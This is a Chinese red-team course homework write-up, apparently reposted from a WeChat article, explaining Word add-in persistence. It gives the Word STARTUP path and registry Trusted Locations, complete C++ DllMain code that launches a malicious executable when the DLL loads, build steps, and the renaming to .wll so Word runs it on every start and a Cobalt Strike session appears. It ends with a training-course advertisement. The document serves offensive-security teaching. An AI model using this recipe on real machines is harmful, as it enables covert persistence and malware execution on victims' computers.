文章来源|MS08067 红队培训班第10节课作业
本文作者:谢耀伟(红队培训班学员)
按老师要求完成布置的作业如下:
关于 office 的注册表
location0
%APPDATA%\Microsoft\Templates 是模板⽂件
location1
C:\Program Files (x86)\Microsoft Office\Root\Templates\
也是模板⽂件
location2
%APPDATA%\Microsoft\Word\Startup
Office 的外部插件是 DLL ⽂件,扩展名不同,表示使⽤不同的应⽤程序,例如 .wll 代表 Word,.xll 代表 Excel。Metasploit Framework 的“msfvenom”可⽤于创建可被使⽤的 DLL ⽂件,然后将扩展名修改为“.wll”(Word 插件程序的扩展名),并将⽂件移动到 Word 启动⽂件夹,每次 Word 启动时执⾏外部插件
原理
三件套都可以加载插件,利⽤路径为:插件路径下的 dll → dll 代码中加载恶意 exe → 上线
注册表中
计算机\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Locations\
下有三个 location
我们使⽤ location2,这个是 Word 插件的⽂件夹,Word 启动是会⾃动加载此处的 dll ⽂件
实战
路径(路径栏输⼊ %data% 可以快速进⼊ Roaming 路径):
C:\Users\Laughing\AppData\Roaming\Microsoft\Word\STARTUP
这个路径下放⼊ dll ⽂件,每次 word ⼀打开
但是不能使⽤ cs 默认⽣成的 dll ⽂件,需要使⽤ vs studio 重新⽣成
生成 dll ⽂件
创建新项⽬ → 动态链接库 → 创建
⼀直下⼀步就可以看到⽣成的 cpp 和⾃动⽣成的代码了
添加关键代码
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>//添加库
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
system("start D:\\artifact.exe");//此行为恶意exe路径
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
生成 dll
选择 release 版本,x86 架构,点击 ⽣成 → 重新⽣成解决⽅案
然后将⽣成的 dll ⽂件复制粘贴到 STARTUP 路径下,然后更改后缀名为 wll
上线
打开 Word ⽂档,CS 即可看到上线
红队安全培训 第二期班 8月13号开班,第二期的课程大纲目录根据第一期班的同学的反馈和要求,已有重大调整,增加了更多的实战中红队的渗透思路和实战技巧干货,具体授课目录可联系小客服获取!
扫描下方二维码加入星球学习
加入后邀请你进入内部微信群,内部微信群永久有效!
文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247494566&idx=1&sn=d691755ef4caa5f8099cf95fdb8d66c0&chksm=fc3c52a7cb4bdbb137cddd8a098c17af1a767b09834f14f9eff686abee99b6e85cfc5bf9c9ca#rd
如有侵权请联系:admin#unsafe.sh